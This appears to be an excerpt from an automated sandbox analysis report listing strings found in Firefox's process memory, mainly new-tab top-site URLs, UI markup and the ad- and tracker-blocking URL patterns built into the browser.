Source: firefox.exe, 00000018.00000002.2828915424.000001DE00172000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: UpdateService:_postUpdateProcessing - removing update for older application version or same application version with same build ID. update application version: Boolean used to determine if the results defined in `exposureResults` should be shown in search results. Should be false for Control branch of an experiment.You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/It looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single functionhttps://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2828915424.000001DE001DE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "*://*.adsafeprotected.com/*.js*""*://*.adsafeprotected.com/*/imp/*""*://*.adsafeprotected.com/*/unit/*""*://s.webtrends.com/js/webtrends.min.js""*://*.adsafeprotected.com/jload""*://securepubads.g.doubleclick.net/gampad/*ad*""*://*.adsafeprotected.com/jsvid""*://*.adsafeprotected.com/*/Serving/*"Please use $(ref:runtime.lastError).^(sha256|sha512):[0-9a-fA-F]{64,128}$"*://*.adsafeprotected.com/jload?*"This color property is ignored in Firefox >= 89.reject_trackers_and_partition_foreign"*://ads.stickyadstv.com/user-matching*""*://*.adsafeprotected.com/jsvid?*"Please use $(ref:runtime.onRestartRequired)."*://vast.adsafeprotected.com/vast*""*://www.facebook.com/platform/impression.php*""*://pubads.g.doubleclick.net/gampad/*ad*""*://track.adform.net/Serving/TrackPoint/*"MAX_SUSTAINED_WRITE_OPERATIONS_PER_MINUTE"*://track.adform.net/Serving/TrackPoint/*""*://pixel.advertising.com/firefox-etp""*://*.adsafeprotected.com/*/Serving/*""*://*.adsafeprotected.com/*.png*""*://*.adsafeprotected.com/jsvid""*://*.adsafeprotected.com/tpl?*""*://pixel.advertising.com/firefox-etp""*://pubads.g.doubleclick.net/gampad/*ad*""*://pubads.g.doubleclick.net/gampad/*ad-blk*""*://vast.adsafeprotected.com/vast*""*://*.adsafeprotected.com/*.gif*""*://securepubads.g.doubleclick.net/gampad/*ad*""*://*.adsafeprotected.com/*/adj*""*://securepubads.g.doubleclick.net/gampad/*ad*""*://*.adsafeprotected.com/jsvid?*""*://pubads.g.doubleclick.net/gampad/*ad*""*://pubads.g.doubleclick.net/gampad/*ad-blk*""*://*.adsafeprotected.com/jload""*://ads.stickyadstv.com/auto-user-sync*""*://cdn.cmp.advertising.com/firefox-etp""*://vast.adsafeprotected.com/vast*""https://ads.stickyadstv.com/firefox-etp""*://*.adsafeprotected.com/*/unit/*""*://*.adsafeprotected.com/tpl?*""*://www.facebook.com/platform/impression.php*""*://ads.stickyadstv.com/user-matching*""*://*.adsafeprotected.com/*.js*""*://*.adsafeprotected.com/*/imp/*""*://*.adsafeprotected.com/services/pub*""*://*.adsafeprotected.com/jload?*""*://track.adform.net/Serving/TrackPoint/*""*://*.adsafeprotected.com/services/pub*""*://ads.stickyadstv.com/user-matching*""*://*.adsafeprotected.com/*/imp/*""*://*.adsafeprotected.com/jload""*://*.adsafeprotected.com/jsvid""*://ads.stickyadstv.com/auto-user-sync*""*://www.facebook.com/platform/impression.php*""*://*.adsafeprotected.com/*.gif*""*://*.adsafeprotected.com/jload?*""*://*.adsafeprotected.com/jsvid?*""*://*.adsafeprotected.com/*.js*""*://*.adsafeprotected.com/*.png*""*://*.adsafeprotected.com/*/unit/*""*://*.adsafeprotected.com/*/Serving/*""*://*.adsafeprotected.com/tpl?*""*://*.adsafeprotected.com/*/adj*""*://*.adsafeprotected.com/services/pub*""*://trends.google.com/trends/embed*"["*://trends.google.com/trends/embed*"]"*://trends.google.com/trends/embed*""https://ads.stickyadstv.com/firefox-etp"X! equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2828915424.000001DE001DE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "*://www.facebook.com/platform/impression.php*" equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2828915424.000001DE00103000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://track.adform.net/Serving/TrackPoint/**://pubads.g.doubleclick.net/gampad/*xml_vmap1**://pubads.g.doubleclick.net/gampad/*xml_vmap2*https://ads.stickyadstv.com/firefox-etp*://trends.google.com/trends/embed**://pubads.g.doubleclick.net/gampad/*ad**://www.facebook.com/platform/impression.php*resource://gre/modules/ExtensionCommon.sys.mjs equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2828915424.000001DE00103000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2830156182.000001DE00D3E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: -l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Wikipedia&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.reddit.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="R"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/reddit-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Reddit<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Reddit&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" href="https://twitter.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="T"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/twitter-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Twitter<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Twitter&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li></ul><div class="edit-topsites-wrapper"></div></div></section></div></div></div></div><style data-styles="[[null]]"></style></div><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div></div></div></div><style data-styles="[[null]]"></style></div></div></main></div></div> equals www.twitter.com (Twitter)
Source: firefox.exe, 00000018.00000002.2880310530.000001DE05603000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2880310530.000001DE05603000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2885954167.000001DE05A19000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2876461251.000001DE04880000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2878398866.000001DE049EB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2828915424.000001DE00172000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2828915424.000001DE00172000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000018.00000002.2828915424.000001DE00172000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2828915424.000001DE001DE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ["*://track.adform.net/Serving/TrackPoint/*", "*://pagead2.googlesyndication.com/pagead/*.js*fcd=true", "*://pagead2.googlesyndication.com/pagead/js/*.js*fcd=true", "*://pixel.advertising.com/firefox-etp", "*://cdn.cmp.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "https://static.adsafeprotected.com/firefox-etp-js", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"] equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2885513131.000001DE05909000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2885513131.000001DE05903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"] equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2828915424.000001DE00126000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", "*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"] equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2828915424.000001DE00126000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", "*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"] equals www.rambler.ru (Rambler)
Source: firefox.exe, 00000018.00000002.2885513131.000001DE05903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["image"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2885513131.000001DE05903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["imageset"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2828915424.000001DE00158000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", "*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 00000018.00000002.2828915424.000001DE00154000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2828915424.000001DE00158000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", "*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", 